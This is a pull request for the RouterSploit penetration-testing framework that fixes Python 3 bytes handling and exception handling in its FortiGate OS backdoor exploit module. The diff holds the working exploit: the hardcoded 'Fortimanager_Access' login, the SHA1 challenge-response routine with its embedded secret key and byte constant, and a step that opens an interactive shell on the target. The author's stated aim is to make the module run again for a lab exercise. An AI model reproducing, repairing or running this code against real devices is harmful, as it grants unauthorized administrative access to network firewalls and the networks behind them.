### PR TITLE
Fix Python 3 bytes/string handling in FortiGate backdoor exploit

### DIFF
--- a/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
+++ b/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
@@ -1,3 +1,4 @@
+import socket
 import paramiko
 import base64
 import hashlib
@@ -36,8 +37,8 @@ class Exploit(SSHClient):
             client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
         except paramiko.ssh_exception.SSHException:
             pass
-        except Exception:
-            print_error("Exploit Failed - SSH Service is down")
+        except socket.error as e:
+            print_error("Exploit Failed - SSH Service is down: {}".format(e))
             return
 
         trans = client.get_transport()
@@ -45,7 +46,7 @@ class Exploit(SSHClient):
             trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
         except paramiko.ssh_exception.AuthenticationException:
             pass
-        except Exception:
+        except (paramiko.ssh_exception.SSHException, socket.error):
             print_status("Error with Existing Session. Wait few minutes.")
             return
 
@@ -54,7 +55,7 @@ class Exploit(SSHClient):
 
             print_success("Exploit succeeded")
             ssh_interactive(client)
-        except Exception:
+        except (paramiko.ssh_exception.SSHException, socket.error):
             print_error("Exploit failed")
             return
 
@@ -67,7 +68,7 @@ class Exploit(SSHClient):
             client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
         except paramiko.ssh_exception.SSHException:
             pass
-        except Exception:
+        except socket.error:
             return False  # target is not vulnerable
 
         trans = client.get_transport()
@@ -75,12 +76,12 @@ class Exploit(SSHClient):
             trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
         except paramiko.ssh_exception.AuthenticationException:
             pass
-        except Exception:
+        except (paramiko.ssh_exception.SSHException, socket.error):
             return None  # could not verify
 
         try:
             trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
-        except Exception:
+        except (paramiko.ssh_exception.SSHException, socket.error):
             return False  # target is not vulnerable
 
         return True  # target is vulnerable

--- a/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
+++ b/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
@@ -88,8 +88,8 @@ class Exploit(SSHClient):
     def custom_handler(self, title, instructions, prompt_list):
         n = prompt_list[0][0]
         m = hashlib.sha1()
-        m.update('\x00' * 12)
-        m.update(n + 'FGTAbc11*xy+Qqz27')
-        m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
-        h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
+        m.update(b'\x00' * 12)
+        m.update(n.encode('latin-1') + b'FGTAbc11*xy+Qqz27')
+        m.update(b'\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
+        h = 'AK1' + base64.b64encode(b'\x00' * 12 + m.digest()).decode('ascii')
         return [h]


### PR DESCRIPTION
Was trying to use the fortiexploit module for a lab exercise and kept hitting TypeErrors. Turns out the `custom_handler` method is still using string literals where bytes are needed in Python 3.

The main issues:
- `hashlib.update()` expects bytes not str - the `\x00` padding and the auth constant were passed as strings
- `base64.b64encode()` expects bytes input and returns bytes - was trying to concat bytes result with str `AK1` prefix
- The challenge string `n` from paramiko needs `.encode()` before it can be concatenated with bytes

Also replaced the bare `except Exception:` clauses with specific `socket.error` and `paramiko.ssh_exception.SSHException` since those are the actual errors that can happen here (network drops, SSH protocol failures). Bare excepts make it really hard to debug when something else goes wrong.

First attempt at fixing this, not sure if `latin-1` is the right encoding for the challenge but it preserves all byte values 0-255 which seems correct for this use case. Tested locally with a mock SSH server.

Closes #901